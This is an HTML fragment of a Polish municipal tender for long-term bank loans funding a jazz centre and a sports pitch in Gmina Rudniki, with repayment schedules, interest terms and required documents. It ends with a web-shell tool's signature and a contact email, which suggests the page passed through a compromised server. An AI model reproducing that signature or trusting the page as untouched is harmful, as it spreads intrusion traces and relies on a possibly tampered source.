   31.12.2008r. wraz z prognozą ich kształtowania się w latach
    następnych,
- opinię RIO Opole o możliwości spłaty kredytu (zostanie dostarczona
    później po uzyskaniu jej z RIO),
- pismo o wyborze Wójta.

Termin postawienia do dyspozycji środków finansowych:
- w ciągu 30 dni od podpisania umowy kredytowej z możliwością
   wykorzystania do dnia  31 grudnia 2009 roku.
Zamawiający zastrzega sobie prawo rezygnacji z któregokolwiek kredytu, albo zmniejszenia wysokości udzielonego kredytu w sytuacji pozyskania przez Zamawiającego środków finansowania zadania z innych źródeł oraz kiedy nie dojdzie do realizacji któregokolwiek zadania w wyniku nie pozyska środków finansowych zewnętrznych przewidzianych w planie inwestycyjnym.
Zamawiający wówczas nie będzie ponosił żadnych kosztów i opłat z tym związanych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kredyty długoterminowe na zadania inwestycyjne
II część PN 341-PN-2/2009/2 zadanie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kredyty długoterminowe do  wysokości  510 000 zł z terminem realizacji spłaty  do 2014 roku przeznaczone będą na wykonanie :
- przebudowy domu kultury na Centrum Spotkań Muzyków Jazzowych w
   Rudnikach,
- budowę boiska o sztucznej nawierzchni w Dalachowie.
W zakres 2 zadania wchodzą następujące inwestycje:
1)   Przebudowa domu kultury na Centrum Spotkań Muzyków Jazzowych
      w Rudnikach - planowana kwota kredytu 210 000 zł,
2)  Budowa boiska o sztucznej nawierzchni w Dalachowie - planowana
      kwota kredytu 300 000 zł,
Spłata kredytu następować będzie następująco:
 rok 2009 - kwota kapitału 57 000 zł, 
 rok 2010 - kwota kapitału 112 000 zł,
 rok 2011- kwota kapitału 112 000 zł, 
 rok 2012 - kwota kapitału 112 00 zł,
 rok 2013 - kwota kapitału  87 000 zł, 
 rok 2014 - kwota kapitału  30 000 zł. 
Terminy spłat rat kredytów ustala się na  pierwszy dzień miesiąca czerwca i grudnia  każdego roku. Harmonogram spłat rat kredytów jest załącznikiem do SIWZ p.n.  Zobowiązania  kredytowe Gminy Rudniki wraz z prognozą ich kształtowania się w latach następnych.
Na potrzeby wyliczenia łącznej ceny oferty należy przyjąć datę uruchomienia kredytu: 1 czerwiec 2009 rok 
Spłata odsetek następować będzie w  okresach miesięcznych do 10 dnia następnego miesiąca za jaki odsetki są  naliczane, począwszy od dnia uruchomienia pierwszej transzy kredytu oraz od wielkości kredytu wykorzystanego. Bank zobowiązany będzie do wyliczenia odsetek i przesłania obciążenia dla zamawiającego  najpóźniej  na 5 dni przed  terminem płatności odsetek. Oprocentowanie kredytu  obliczone będzie  według zmiennej stawki referencyjnej WIBOR dla depozytów trzymiesięcznych, (średnia wielkość notowań z poprzedniego miesiąca poprzedzającego spłatę raty kredytu publikowana w internetowym Reuters - na stronie internetowej www.money.pl) plus marża banku.
Przy kalkulowaniu odsetek należy przyjąć 365 dni w roku niezależnie czy to będzie rok przestępny czy nie, a ilość dni w miesiącu tyle ile liczy dany miesiąc.
Dla celów wyliczeń oferty należy przyjąć  WIBOR 3M - 5,50%
 Jednorazowa prowizja bankowa - O%
 Uruchamianie transz kredytu przez bank następować będzie na wniosek zamawiającego w terminie nie dłuższym 3 dni od wystąpienia z wnioskiem.
Zastrzega się możliwość aneksowania umowy w zakresie  wykorzystania części bądź całości kredytu w roku 2009, bez ponoszenia dodatkowych kosztów.
Kredyty będą  udzielane  na  podstawie umowy zaproponowanej przez bank i zaakceptowanej przez zamawiającego, przy czym umowa musi obejmować istotne zapisy zawarte w specyfikacji istotnych warunków zamówienia  i nie może
Zastrzega się ujęcie  w umowie możliwości wcześniejszej spłaty kredytu bądź rezygnacji z części kredytu bez ponoszenia dodatkowych kosztów wynikających z tych tytułów. 
W przypadku wcześniejszej spłaty poszczególnych rat bądź całości kredytu, odsetki naliczane będą tylko za okres do terminu spłaty. Jedynym kosztem kredytu będzie oprocentowanie, nie przewiduje się prowizji ani żadnych innych kosztów. 

Celem wstępnego zbadania zdolności kredytowej zamawiający do specyfikacji dołącza dokumenty:
- sprawozdanie zbiorcze z wykonania dochodów i wydatków
   budżetowych za 2007r. i III  kwartały   2008 r.,
- sprawozdanie  o nadwyżce/deficycie  za 2007r. i III kwartały 2008r.,
- sprawozdanie kwartalne o stanie zobowiązań  na koniec 2007r.
   i na dzień 30.09.2008r.,
-  sprawozdanie kwartalne o stanie należności na koniec 2007r.
    i na dzień 30.09. 2008r.
Po sporządzeniu sprawozdawczości rocznej za 2008r wyżej wymienione sprawozdania  oraz sprawozdanie z wykonania dochodów podatkowych gminy w terminie późniejszym również zostaną dołączone do specyfikacji 
- plan dochodów i wydatków budżetowych ( w wersji pierwotnej),
- plan przychodów i rozchodów budżetowych ( w wersji pierwotnej),
- plan inwestycji na 2009 rok ( w wersji pierwotnej),
- opinie RIO Opole o projekcie budżetu gminy na 2009 rok,
- opinia o możliwości sfinansowania deficytu budżetowego
    i prawidłowości prognozy kwoty długu,
- uchwałę  w sprawie uchwalenia budżetu gminy na 2009r.
- uchwałę Nr XXIII/185/09 Rady Gminy Rudniki z dnia 3 lutego 2009r.
   w sprawie zmian w Planie inwestycji finansowanych z budżetu
    w 2009 roku,
- uchwałę Nr XXIII/192/09 Rady Gminy Rudniki z dnia 3 lutego 2009r.
  w sprawie zmian w budżecie  gminy na 2009 rok,
- plan dochodów i wydatków budżetowych oraz przychodów i rozchodów
  ( po korekcie dokonanych zmianami w budżecie uchwałą 
    z 3 lutego 2009r.),
- uchwały o zaciągnięciu kredytu na poszczególne zadania objęte  
   niniejszą specyfikacją - 2 szt.(objęte powyższym zadaniem),
- zestawienie przepływów pieniężnych ( po ostatniej zmianie
   z 3 lutego br.),
- informację o zobowiązaniach kredytowych gminy wg stanu na dzień 
   31.12.2008r. wraz z prognozą ich kształtowania się w latach
    następnych,
- opinię RIO Opole o możliwości spłaty kredytu ( zostanie dostarczona
   później po uzyskaniu jej z RIO),
- pismo o wyborze Wójta.

Termin postawienia do dyspozycji środków finansowych:
- w ciągu 30 dni od podpisania umowy kredytowej z możliwością
   wykorzystania do dnia  31 grudnia 2009 roku.
Zamawiający zastrzega sobie prawo rezygnacji z któregokolwiek kredytu, albo zmniejszenia wysokości udzielonego kredytu w sytuacji pozyskania przez Zamawiającego środków finansowania zadania z innych źródeł oraz kiedy nie dojdzie do realizacji któregokolwiek zadania w wyniku nie pozyska środków finansowych zewnętrznych przewidzianych w planie inwestycyjnym.
Zamawiający wówczas nie będzie ponosił żadnych kosztów i opłat z tym związanych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com